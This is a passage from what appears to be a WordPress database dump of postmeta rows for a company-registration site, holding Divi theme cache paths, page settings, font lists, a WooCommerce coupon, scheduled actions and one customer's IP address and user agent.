lic_html/companyregistration/wp-content/cache/et/62\";s:8:\"location\";s:6:\"footer\";}}'),(7083,68,'_et_core_cached_page_resources','a:2:{s:36:\"et-core-unified-cached-inline-styles\";O:20:\"ET_Core_PageResource\":18:{s:8:\"BASE_DIR\";N;s:4:\"PATH\";s:107:\"/home2/gitalst4/public_html/companyregistration/wp-content/cache/et//et-core-unified-15002819941601.min.css\";s:8:\"TEMP_DIR\";N;s:3:\"URL\";s:94:\"https://companyregistration.online/wp-content/cache/et//et-core-unified-15002819941601.min.css\";s:4:\"data\";N;s:8:\"disabled\";N;s:8:\"enqueued\";N;s:13:\"forced_inline\";N;s:8:\"filename\";s:15:\"et-core-unified\";s:7:\"inlined\";N;s:5:\"owner\";s:4:\"core\";s:7:\"post_id\";b:0;s:8:\"priority\";i:10;s:4:\"slug\";s:36:\"et-core-unified-cached-inline-styles\";s:4:\"type\";s:5:\"style\";s:19:\"write_file_location\";N;s:9:\"BASE_PATH\";s:67:\"/home2/gitalst4/public_html/companyregistration/wp-content/cache/et\";s:8:\"location\";s:9:\"head-late\";}s:39:\"et-core-unified-vb-cached-inline-styles\";O:20:\"ET_Core_PageResource\":18:{s:8:\"BASE_DIR\";N;s:4:\"PATH\";s:110:\"/home2/gitalst4/public_html/companyregistration/wp-content/cache/et//et-core-unified-vb-15002819941603.min.css\";s:8:\"TEMP_DIR\";N;s:3:\"URL\";s:97:\"https://companyregistration.online/wp-content/cache/et//et-core-unified-vb-15002819941603.min.css\";s:4:\"data\";N;s:8:\"disabled\";N;s:8:\"enqueued\";N;s:13:\"forced_inline\";N;s:8:\"filename\";s:18:\"et-core-unified-vb\";s:7:\"inlined\";N;s:5:\"owner\";s:4:\"core\";s:7:\"post_id\";b:0;s:8:\"priority\";i:10;s:4:\"slug\";s:39:\"et-core-unified-vb-cached-inline-styles\";s:4:\"type\";s:5:\"style\";s:19:\"write_file_location\";N;s:9:\"BASE_PATH\";s:67:\"/home2/gitalst4/public_html/companyregistration/wp-content/cache/et\";s:8:\"location\";s:6:\"footer\";}}'),(7084,79,'_et_core_cached_page_resources','a:2:{s:36:\"et-core-unified-cached-inline-styles\";O:20:\"ET_Core_PageResource\":18:{s:8:\"BASE_DIR\";N;s:4:\"PATH\";s:107:\"/home2/gitalst4/public_html/companyregistration/wp-content/cache/et//et-core-unified-15002825791628.min.css\";s:8:\"TEMP_DIR\";N;s:3:\"URL\";s:94:\"https://companyregistration.online/wp-content/cache/et//et-core-unified-15002825791628.min.css\";s:4:\"data\";N;s:8:\"disabled\";N;s:8:\"enqueued\";N;s:13:\"forced_inline\";N;s:8:\"filename\";s:15:\"et-core-unified\";s:7:\"inlined\";N;s:5:\"owner\";s:4:\"core\";s:7:\"post_id\";b:0;s:8:\"priority\";i:10;s:4:\"slug\";s:36:\"et-core-unified-cached-inline-styles\";s:4:\"type\";s:5:\"style\";s:19:\"write_file_location\";N;s:9:\"BASE_PATH\";s:67:\"/home2/gitalst4/public_html/companyregistration/wp-content/cache/et\";s:8:\"location\";s:9:\"head-late\";}s:39:\"et-core-unified-vb-cached-inline-styles\";O:20:\"ET_Core_PageResource\":18:{s:8:\"BASE_DIR\";N;s:4:\"PATH\";s:110:\"/home2/gitalst4/public_html/companyregistration/wp-content/cache/et//et-core-unified-vb-15002825791629.min.css\";s:8:\"TEMP_DIR\";N;s:3:\"URL\";s:97:\"https://companyregistration.online/wp-content/cache/et//et-core-unified-vb-15002825791629.min.css\";s:4:\"data\";N;s:8:\"disabled\";N;s:8:\"enqueued\";N;s:13:\"forced_inline\";N;s:8:\"filename\";s:18:\"et-core-unified-vb\";s:7:\"inlined\";N;s:5:\"owner\";s:4:\"core\";s:7:\"post_id\";b:0;s:8:\"priority\";i:10;s:4:\"slug\";s:39:\"et-core-unified-vb-cached-inline-styles\";s:4:\"type\";s:5:\"style\";s:19:\"write_file_location\";N;s:9:\"BASE_PATH\";s:67:\"/home2/gitalst4/public_html/companyregistration/wp-content/cache/et\";s:8:\"location\";s:6:\"footer\";}}'),(7088,369,'_et_core_cached_page_resources','a:2:{s:36:\"et-core-unified-cached-inline-styles\";O:20:\"ET_Core_PageResource\":18:{s:8:\"BASE_DIR\";N;s:4:\"PATH\";s:110:\"/home2/gitalst4/public_html/companyregistration/wp-content/cache/et/369/et-core-unified-15002959323137.min.css\";s:8:\"TEMP_DIR\";N;s:3:\"URL\";s:97:\"https://companyregistration.online/wp-content/cache/et/369/et-core-unified-15002959323137.min.css\";s:4:\"data\";N;s:8:\"disabled\";N;s:8:\"enqueued\";N;s:13:\"forced_inline\";N;s:8:\"filename\";s:15:\"et-core-unified\";s:7:\"inlined\";N;s:5:\"owner\";s:4:\"core\";s:7:\"post_id\";i:369;s:8:\"priority\";i:10;s:4:\"slug\";s:36:\"et-core-unified-cached-inline-styles\";s:4:\"type\";s:5:\"style\";s:19:\"write_file_location\";N;s:9:\"BASE_PATH\";s:71:\"/home2/gitalst4/public_html/companyregistration/wp-content/cache/et/369\";s:8:\"location\";s:9:\"head-late\";}s:39:\"et-core-unified-vb-cached-inline-styles\";O:20:\"ET_Core_PageResource\":18:{s:8:\"BASE_DIR\";N;s:4:\"PATH\";s:113:\"/home2/gitalst4/public_html/companyregistration/wp-content/cache/et/369/et-core-unified-vb-15002959388353.min.css\";s:8:\"TEMP_DIR\";N;s:3:\"URL\";s:100:\"https://companyregistration.online/wp-content/cache/et/369/et-core-unified-vb-15002959388353.min.css\";s:4:\"data\";N;s:8:\"disabled\";N;s:8:\"enqueued\";N;s:13:\"forced_inline\";N;s:8:\"filename\";s:18:\"et-core-unified-vb\";s:7:\"inlined\";N;s:5:\"owner\";s:4:\"core\";s:7:\"post_id\";i:369;s:8:\"priority\";i:10;s:4:\"slug\";s:39:\"et-core-unified-vb-cached-inline-styles\";s:4:\"type\";s:5:\"style\";s:19:\"write_file_location\";N;s:9:\"BASE_PATH\";s:71:\"/home2/gitalst4/public_html/companyregistration/wp-content/cache/et/369\";s:8:\"location\";s:6:\"footer\";}}'),(7090,7,'_et_core_cached_page_resources','a:2:{s:36:\"et-core-unified-cached-inline-styles\";O:20:\"ET_Core_PageResource\":18:{s:8:\"BASE_DIR\";N;s:4:\"PATH\";s:108:\"/home2/gitalst4/public_html/companyregistration/wp-content/cache/et/7/et-core-unified-15003462858084.min.css\";s:8:\"TEMP_DIR\";N;s:3:\"URL\";s:95:\"https://companyregistration.online/wp-content/cache/et/7/et-core-unified-15003462858084.min.css\";s:4:\"data\";N;s:8:\"disabled\";N;s:8:\"enqueued\";N;s:13:\"forced_inline\";N;s:8:\"filename\";s:15:\"et-core-unified\";s:7:\"inlined\";N;s:5:\"owner\";s:4:\"core\";s:7:\"post_id\";i:7;s:8:\"priority\";i:10;s:4:\"slug\";s:36:\"et-core-unified-cached-inline-styles\";s:4:\"type\";s:5:\"style\";s:19:\"write_file_location\";N;s:9:\"BASE_PATH\";s:69:\"/home2/gitalst4/public_html/companyregistration/wp-content/cache/et/7\";s:8:\"location\";s:9:\"head-late\";}s:39:\"et-core-unified-vb-cached-inline-styles\";O:20:\"ET_Core_PageResource\":18:{s:8:\"BASE_DIR\";N;s:4:\"PATH\";s:111:\"/home2/gitalst4/public_html/companyregistration/wp-content/cache/et/7/et-core-unified-vb-15003462858084.min.css\";s:8:\"TEMP_DIR\";N;s:3:\"URL\";s:98:\"https://companyregistration.online/wp-content/cache/et/7/et-core-unified-vb-15003462858084.min.css\";s:4:\"data\";N;s:8:\"disabled\";N;s:8:\"enqueued\";N;s:13:\"forced_inline\";N;s:8:\"filename\";s:18:\"et-core-unified-vb\";s:7:\"inlined\";N;s:5:\"owner\";s:4:\"core\";s:7:\"post_id\";i:7;s:8:\"priority\";i:10;s:4:\"slug\";s:39:\"et-core-unified-vb-cached-inline-styles\";s:4:\"type\";s:5:\"style\";s:19:\"write_file_location\";N;s:9:\"BASE_PATH\";s:69:\"/home2/gitalst4/public_html/companyregistration/wp-content/cache/et/7\";s:8:\"location\";s:6:\"footer\";}}'),(7093,4,'_et_core_cached_page_resources','a:2:{s:36:\"et-core-unified-cached-inline-styles\";O:20:\"ET_Core_PageResource\":18:{s:8:\"BASE_DIR\";N;s:4:\"PATH\";s:108:\"/home2/gitalst4/public_html/companyregistration/wp-content/cache/et/4/et-core-unified-15003738183354.min.css\";s:8:\"TEMP_DIR\";N;s:3:\"URL\";s:95:\"https://companyregistration.online/wp-content/cache/et/4/et-core-unified-15003738183354.min.css\";s:4:\"data\";N;s:8:\"disabled\";N;s:8:\"enqueued\";N;s:13:\"forced_inline\";N;s:8:\"filename\";s:15:\"et-core-unified\";s:7:\"inlined\";N;s:5:\"owner\";s:4:\"core\";s:7:\"post_id\";i:4;s:8:\"priority\";i:10;s:4:\"slug\";s:36:\"et-core-unified-cached-inline-styles\";s:4:\"type\";s:5:\"style\";s:19:\"write_file_location\";N;s:9:\"BASE_PATH\";s:69:\"/home2/gitalst4/public_html/companyregistration/wp-content/cache/et/4\";s:8:\"location\";s:9:\"head-late\";}s:39:\"et-core-unified-vb-cached-inline-styles\";O:20:\"ET_Core_PageResource\":18:{s:8:\"BASE_DIR\";N;s:4:\"PATH\";s:111:\"/home2/gitalst4/public_html/companyregistration/wp-content/cache/et/4/et-core-unified-vb-15003738183355.min.css\";s:8:\"TEMP_DIR\";N;s:3:\"URL\";s:98:\"https://companyregistration.online/wp-content/cache/et/4/et-core-unified-vb-15003738183355.min.css\";s:4:\"data\";N;s:8:\"disabled\";N;s:8:\"enqueued\";N;s:13:\"forced_inline\";N;s:8:\"filename\";s:18:\"et-core-unified-vb\";s:7:\"inlined\";N;s:5:\"owner\";s:4:\"core\";s:7:\"post_id\";i:4;s:8:\"priority\";i:10;s:4:\"slug\";s:39:\"et-core-unified-vb-cached-inline-styles\";s:4:\"type\";s:5:\"style\";s:19:\"write_file_location\";N;s:9:\"BASE_PATH\";s:69:\"/home2/gitalst4/public_html/companyregistration/wp-content/cache/et/4\";s:8:\"location\";s:6:\"footer\";}}'),(7094,28,'_et_core_cached_page_resources','a:2:{s:36:\"et-core-unified-cached-inline-styles\";O:20:\"ET_Core_PageResource\":18:{s:8:\"BASE_DIR\";N;s:4:\"PATH\";s:109:\"/home2/gitalst4/public_html/companyregistration/wp-content/cache/et/28/et-core-unified-15003739230218.min.css\";s:8:\"TEMP_DIR\";N;s:3:\"URL\";s:96:\"https://companyregistration.online/wp-content/cache/et/28/et-core-unified-15003739230218.min.css\";s:4:\"data\";N;s:8:\"disabled\";N;s:8:\"enqueued\";N;s:13:\"forced_inline\";N;s:8:\"filename\";s:15:\"et-core-unified\";s:7:\"inlined\";N;s:5:\"owner\";s:4:\"core\";s:7:\"post_id\";i:28;s:8:\"priority\";i:10;s:4:\"slug\";s:36:\"et-core-unified-cached-inline-styles\";s:4:\"type\";s:5:\"style\";s:19:\"write_file_location\";N;s:9:\"BASE_PATH\";s:70:\"/home2/gitalst4/public_html/companyregistration/wp-content/cache/et/28\";s:8:\"location\";s:9:\"head-late\";}s:39:\"et-core-unified-vb-cached-inline-styles\";O:20:\"ET_Core_PageResource\":18:{s:8:\"BASE_DIR\";N;s:4:\"PATH\";s:112:\"/home2/gitalst4/public_html/companyregistration/wp-content/cache/et/28/et-core-unified-vb-15003739230219.min.css\";s:8:\"TEMP_DIR\";N;s:3:\"URL\";s:99:\"https://companyregistration.online/wp-content/cache/et/28/et-core-unified-vb-15003739230219.min.css\";s:4:\"data\";N;s:8:\"disabled\";N;s:8:\"enqueued\";N;s:13:\"forced_inline\";N;s:8:\"filename\";s:18:\"et-core-unified-vb\";s:7:\"inlined\";N;s:5:\"owner\";s:4:\"core\";s:7:\"post_id\";i:28;s:8:\"priority\";i:10;s:4:\"slug\";s:39:\"et-core-unified-vb-cached-inline-styles\";s:4:\"type\";s:5:\"style\";s:19:\"write_file_location\";N;s:9:\"BASE_PATH\";s:70:\"/home2/gitalst4/public_html/companyregistration/wp-content/cache/et/28\";s:8:\"location\";s:6:\"footer\";}}'),(7095,571,'_et_core_cached_page_resources','a:2:{s:36:\"et-core-unified-cached-inline-styles\";O:20:\"ET_Core_PageResource\":18:{s:8:\"BASE_DIR\";N;s:4:\"PATH\";s:110:\"/home2/gitalst4/public_html/companyregistration/wp-content/cache/et/571/et-core-unified-15003740969969.min.css\";s:8:\"TEMP_DIR\";N;s:3:\"URL\";s:97:\"https://companyregistration.online/wp-content/cache/et/571/et-core-unified-15003740969969.min.css\";s:4:\"data\";N;s:8:\"disabled\";N;s:8:\"enqueued\";N;s:13:\"forced_inline\";N;s:8:\"filename\";s:15:\"et-core-unified\";s:7:\"inlined\";N;s:5:\"owner\";s:4:\"core\";s:7:\"post_id\";i:571;s:8:\"priority\";i:10;s:4:\"slug\";s:36:\"et-core-unified-cached-inline-styles\";s:4:\"type\";s:5:\"style\";s:19:\"write_file_location\";N;s:9:\"BASE_PATH\";s:71:\"/home2/gitalst4/public_html/companyregistration/wp-content/cache/et/571\";s:8:\"location\";s:9:\"head-late\";}s:39:\"et-core-unified-vb-cached-inline-styles\";O:20:\"ET_Core_PageResource\":18:{s:8:\"BASE_DIR\";N;s:4:\"PATH\";s:113:\"/home2/gitalst4/public_html/companyregistration/wp-content/cache/et/571/et-core-unified-vb-15003740969969.min.css\";s:8:\"TEMP_DIR\";N;s:3:\"URL\";s:100:\"https://companyregistration.online/wp-content/cache/et/571/et-core-unified-vb-15003740969969.min.css\";s:4:\"data\";N;s:8:\"disabled\";N;s:8:\"enqueued\";N;s:13:\"forced_inline\";N;s:8:\"filename\";s:18:\"et-core-unified-vb\";s:7:\"inlined\";N;s:5:\"owner\";s:4:\"core\";s:7:\"post_id\";i:571;s:8:\"priority\";i:10;s:4:\"slug\";s:39:\"et-core-unified-vb-cached-inline-styles\";s:4:\"type\";s:5:\"style\";s:19:\"write_file_location\";N;s:9:\"BASE_PATH\";s:71:\"/home2/gitalst4/public_html/companyregistration/wp-content/cache/et/571\";s:8:\"location\";s:6:\"footer\";}}'),(7096,28702,'_edit_lock','1500538854:3'),(7097,28702,'_edit_last','3'),(7098,28702,'_wp_page_template','default'),(7099,28702,'_et_pb_post_hide_nav','default'),(7100,28702,'_et_pb_page_layout','et_right_sidebar'),(7101,28702,'_et_pb_side_nav','off'),(7102,28702,'_et_pb_use_builder','on'),(7103,28702,'_et_builder_version','BB|Divi|3.0.58'),(7104,28702,'_et_pb_ab_stats_refresh_interval','hourly'),(7105,28702,'_et_pb_old_content',''),(7106,28702,'_et_pb_enable_shortcode_tracking',''),(7107,28702,'_et_pb_custom_css',''),(7187,184,'_et_builder_version','VB|Divi|3.24'),(7191,184,'_et_pb_ab_refresh_interval','hourly'),(7193,184,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"184\" /]'),(7196,28743,'_et_pb_predefined_layout','on'),(7197,28743,'_et_pb_built_for_post_type','page'),(7198,28743,'_et_pb_layout_applicability','product_tour'),(7312,309,'_et_pb_use_builder','on'),(7314,309,'_et_post_bg_color','#ffffff'),(7315,309,'_et_post_bg_layout','light'),(7316,309,'_et_pb_show_title','on'),(7317,309,'_et_pb_post_hide_nav','default'),(7318,309,'_et_pb_page_layout','et_right_sidebar'),(7319,309,'_et_pb_side_nav','on'),(7320,309,'_et_builder_version','BB|Divi|3.0.69'),(7321,309,'_et_pb_ab_stats_refresh_interval','hourly'),(7322,309,'_et_pb_old_content',''),(7323,309,'_et_pb_enable_shortcode_tracking',''),(7324,309,'_et_pb_custom_css',''),(7326,28788,'_edit_lock','1505721273:3'),(7327,28788,'_edit_last','3'),(7328,28788,'_wp_page_template','default'),(7329,28788,'_et_pb_post_hide_nav','default'),(7330,28788,'_et_pb_page_layout','et_right_sidebar'),(7331,28788,'_et_pb_side_nav','off'),(7332,28788,'_et_pb_use_builder','on'),(7333,28788,'_et_builder_version','BB|Divi|3.0.69'),(7334,28788,'_et_pb_ab_stats_refresh_interval','hourly'),(7335,28788,'_et_pb_old_content',''),(7336,28788,'_et_pb_enable_shortcode_tracking',''),(7337,28788,'_et_pb_custom_css',''),(7338,28799,'_edit_lock','1505915341:3'),(7339,28799,'_edit_last','3'),(7340,28799,'_wp_page_template','default'),(7341,28799,'_et_pb_post_hide_nav','default'),(7342,28799,'_et_pb_page_layout','et_right_sidebar'),(7343,28799,'_et_pb_side_nav','off'),(7344,28799,'_et_pb_use_builder','on'),(7345,28799,'_et_builder_version','BB|Divi|3.0.69'),(7346,28799,'_et_pb_ab_stats_refresh_interval','hourly'),(7347,28799,'_et_pb_old_content',''),(7348,28799,'_et_pb_enable_shortcode_tracking',''),(7349,28799,'_et_pb_custom_css',''),(7600,2,'_et_pb_use_builder','on'),(7603,2,'_et_pb_post_hide_nav','default'),(7604,2,'_et_pb_page_layout','et_right_sidebar'),(7605,2,'_et_pb_side_nav','off'),(7606,2,'_et_builder_version','VB|Divi|3.2.2'),(7607,2,'_et_pb_ab_stats_refresh_interval','hourly'),(7608,2,'_et_pb_old_content',''),(7609,2,'_et_pb_enable_shortcode_tracking',''),(7610,2,'_et_pb_custom_css',''),(7618,7,'_et_pb_post_hide_nav','default'),(7619,7,'_et_pb_page_layout','et_full_width_page'),(7620,7,'_et_pb_side_nav','off'),(7621,7,'_et_pb_use_builder',''),(7622,7,'_et_builder_version','BB|Divi|3.0.85'),(7623,7,'_et_pb_ab_stats_refresh_interval','hourly'),(7624,7,'_et_pb_old_content',''),(7625,7,'_et_pb_enable_shortcode_tracking',''),(7626,7,'_et_pb_custom_css',''),(9235,184,'_et_pb_ab_subjects',''),(9239,28091,'yikes_woo_products_tabs','a:0:{}'),(9240,28944,'_et_pb_row_layout','4_4'),(9241,28944,'_et_pb_built_for_post_type','page'),(9242,28090,'yikes_woo_products_tabs','a:0:{}'),(9243,28088,'yikes_woo_products_tabs','a:0:{}'),(9244,28092,'yikes_woo_products_tabs','a:0:{}'),(9245,28957,'_edit_lock','1525547000:1'),(9246,28957,'_edit_last','1'),(9247,28957,'discount_type','percent'),(9248,28957,'coupon_amount','25'),(9249,28957,'individual_use','no'),(9250,28957,'product_ids',''),(9251,28957,'exclude_product_ids',''),(9252,28957,'usage_limit','0'),(9253,28957,'usage_limit_per_user','1'),(9254,28957,'limit_usage_to_x_items','0'),(9255,28957,'usage_count','1'),(9256,28957,'date_expires',NULL),(9257,28957,'expiry_date',''),(9258,28957,'free_shipping','no'),(9259,28957,'product_categories','a:0:{}'),(9260,28957,'exclude_product_categories','a:0:{}'),(9261,28957,'exclude_sale_items','no'),(9262,28957,'minimum_amount',''),(9263,28957,'maximum_amount',''),(9264,28957,'customer_email','a:0:{}'),(9265,6,'_et_pb_post_hide_nav','default'),(9266,6,'_et_pb_page_layout','et_no_sidebar'),(9267,6,'_et_pb_side_nav','off'),(9268,6,'_et_pb_use_builder','on'),(9269,6,'_et_builder_version','BB|Divi|3.0.87'),(9270,6,'_et_pb_ab_stats_refresh_interval','hourly'),(9271,6,'_et_pb_old_content','[woocommerce_checkout]'),(9272,6,'_et_pb_enable_shortcode_tracking',''),(9273,6,'_et_pb_custom_css',''),(9274,287,'_et_pb_post_hide_nav','default'),(9275,287,'_et_pb_page_layout','et_full_width_page'),(9276,287,'_et_pb_side_nav','off'),(9277,287,'_et_pb_use_builder',''),(9278,287,'_et_builder_version','BB|Divi|3.2.1'),(9279,287,'_et_pb_ab_stats_refresh_interval','hourly'),(9280,287,'_et_pb_old_content',''),(9281,287,'_et_pb_enable_shortcode_tracking',''),(9282,287,'_et_pb_custom_css',''),(9283,5,'_et_pb_post_hide_nav','default'),(9284,5,'_et_pb_page_layout','et_full_width_page'),(9285,5,'_et_pb_side_nav','off'),(9286,5,'_et_pb_use_builder','on'),(9287,5,'_et_builder_version','VB|Divi|3.26.3'),(9289,5,'_et_pb_old_content','[woocommerce_cart]'),(9290,5,'_et_pb_enable_shortcode_tracking',''),(9291,5,'_et_pb_custom_css',''),(9578,28957,'_used_by','1'),(9635,4,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:3:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";s:15:\"et-gf-open-sans\";s:80:\"Open+Sans:300,300italic,regular,italic,600,600italic,700,700italic,800,800italic\";}s:6:\"subset\";a:7:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:4;s:8:\"cyrillic\";i:5;s:5:\"greek\";i:8;s:9:\"greek-ext\";i:10;s:12:\"cyrillic-ext\";}}'),(17718,4,'_et_pb_gutter_width','3'),(17719,31746,'_et_pb_module_type','et_pb_shop'),(17720,31746,'_et_pb_built_for_post_type','page'),(9636,28,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(19659,33038,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566346070;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(9637,7,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(9638,28090,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(20229,33225,'_customer_ip_address','165.255.168.137'),(20230,33225,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(9639,571,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:3:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";s:13:\"et-gf-aldrich\";s:15:\"Aldrich:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(20149,33160,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566524621;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(9640,29011,'_edit_lock','1542118995:1'),(9641,29011,'_edit_last','1'),(9642,29011,'_wp_page_template','default'),(9643,29011,'_et_pb_post_hide_nav','default'),(9644,29011,'_et_pb_page_layout','et_right_sidebar'),(9645,29011,'_et_pb_side_nav','off'),(9646,29011,'_et_pb_use_builder','on'),(9647,29011,'_et_builder_version','BB|Divi|3.17.6'),(9648,29011,'_et_pb_ab_stats_refresh_interval','hourly'),(9649,29011,'_et_pb_old_content',''),(9650,29011,'_et_pb_enable_shortcode_tracking',''),(9651,29011,'_et_pb_custom_css',''),(9652,29011,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:5:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";s:13:\"et-gf-poppins\";s:134:\"Poppins:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";s:27:\"et-gf-saira-extra-condensed\";s:61:\"Saira+Extra+Condensed:100,200,300,regular,500,600,700,800,900\";s:22:\"et-gf-playfair-display\";s:59:\"Playfair+Display:regular,italic,700,700italic,900,900italic\";}s:6:\"subset\";a:5:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"devanagari\";i:4;s:8:\"cyrillic\";}}'),(9653,29011,'_et_pb_use_ab_testing','off'),(9655,29011,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"29011\" /]'),(9665,5,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(9666,6,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(20288,33234,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1566652282;}'),(9770,187,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(20410,33320,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566821177;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(9771,64,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(9823,62,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(20151,33162,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566528976;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(9875,237,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(19726,33124,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566485497;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(9927,75,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(19727,33127,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1566482417;}'),(19728,33128,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1566482418;}'),(9979,76,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(19685,33064,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566403711;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(10031,74,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a